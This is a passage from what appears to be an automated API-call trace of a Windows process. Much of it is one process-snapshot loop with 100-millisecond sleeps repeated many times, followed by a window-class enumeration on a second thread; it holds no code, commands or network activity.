cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.585] Sleep (dwMilliseconds=0x64) [0294.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.681] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.754] Sleep (dwMilliseconds=0x64) [0294.755] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.768] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.885] Sleep (dwMilliseconds=0x64) [0294.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.903] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.976] Sleep (dwMilliseconds=0x64) [0294.977] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.989] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.057] Sleep (dwMilliseconds=0x64) [0295.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0295.070] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.140] Sleep (dwMilliseconds=0x64) [0295.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0295.152] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.222] Sleep (dwMilliseconds=0x64) [0295.224] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0295.412] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.500] Sleep (dwMilliseconds=0x64) [0295.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0295.520] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.601] Sleep (dwMilliseconds=0x64) [0295.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0295.621] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.691] Sleep (dwMilliseconds=0x64) [0295.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0295.707] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.784] Sleep (dwMilliseconds=0x64) [0295.788] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0295.802] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.915] Sleep (dwMilliseconds=0x64) [0295.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0295.928] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.999] Sleep (dwMilliseconds=0x64) [0296.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.012] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.083] Sleep (dwMilliseconds=0x64) [0296.085] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.097] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.168] Sleep (dwMilliseconds=0x64) [0296.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.183] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.255] Sleep (dwMilliseconds=0x64) [0296.257] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.269] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.338] Sleep (dwMilliseconds=0x64) [0296.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.354] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.428] Sleep (dwMilliseconds=0x64) [0296.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.628] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.758] Sleep (dwMilliseconds=0x64) [0296.759] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.771] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.883] Sleep (dwMilliseconds=0x64) [0296.885] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.897] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.974] Sleep (dwMilliseconds=0x64) [0296.976] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0296.989] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.060] Sleep (dwMilliseconds=0x64) [0297.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.074] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.146] Sleep (dwMilliseconds=0x64) [0297.147] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.158] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.229] Sleep (dwMilliseconds=0x64) [0297.232] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.243] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.312] Sleep (dwMilliseconds=0x64) [0297.313] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.329] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.397] Sleep (dwMilliseconds=0x64) [0297.399] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.409] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.505] Sleep (dwMilliseconds=0x64) [0297.506] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.518] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.592] Sleep (dwMilliseconds=0x64) [0297.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.604] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.708] Sleep (dwMilliseconds=0x64) [0297.711] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.721] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.791] Sleep (dwMilliseconds=0x64) [0297.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.803] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.898] Sleep (dwMilliseconds=0x64) [0297.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.916] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.985] Sleep (dwMilliseconds=0x64) [0297.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0297.996] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.066] Sleep (dwMilliseconds=0x64) [0298.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.079] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.155] Sleep (dwMilliseconds=0x64) [0298.158] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.175] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.244] Sleep (dwMilliseconds=0x64) [0298.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.262] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.332] Sleep (dwMilliseconds=0x64) [0298.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.345] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.414] Sleep (dwMilliseconds=0x64) [0298.416] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.427] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.508] Sleep (dwMilliseconds=0x64) [0298.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.525] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.594] Sleep (dwMilliseconds=0x64) [0298.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.610] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.700] Sleep (dwMilliseconds=0x64) [0298.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.715] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.788] Sleep (dwMilliseconds=0x64) [0298.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.800] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.942] Sleep (dwMilliseconds=0x64) [0298.944] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0298.956] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.028] Sleep (dwMilliseconds=0x64) [0299.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.041] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.118] Sleep (dwMilliseconds=0x64) [0299.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.133] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.208] Sleep (dwMilliseconds=0x64) [0299.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.220] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.290] Sleep (dwMilliseconds=0x64) [0299.291] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.302] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.379] Sleep (dwMilliseconds=0x64) [0299.384] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.394] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.519] Sleep (dwMilliseconds=0x64) [0299.523] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.535] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.608] Sleep (dwMilliseconds=0x64) [0299.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.620] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.693] Sleep (dwMilliseconds=0x64) [0299.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.713] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.783] Sleep (dwMilliseconds=0x64) [0299.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.798] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.898] Sleep (dwMilliseconds=0x64) [0299.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0299.911] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.169] Sleep (dwMilliseconds=0x64) [0300.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0300.217] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 60 os_tid = 0x9d0 [0096.369] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) returned 1 [0096.370] GetClassNameA (in: hWnd=0x100e0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0096.370] GetClassNameA (in: hWnd=0x10128, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0096.370] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0096.370] GetClassNameA (in: hWnd=0x10106, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.370] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.407] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.407] GetClassNameA (in: hWnd=0x10108, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.407] GetClassNameA (in: hWnd=0x10104, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.407] GetClassNameA (in: hWnd=0x10102, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0096.407] GetClassNameA (in: hWnd=0x10100, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.407] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.407] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0096.407] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0096.407] GetClassNameA (in: hWnd=0x1014e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0096.407] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.407] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0096.407] GetClassNameA (in: hWnd=0x10186, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0096.407] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0000000005E2DC10-1624832") returned 36 [0096.407] GetClassNameA (in: hWnd=0x10176, 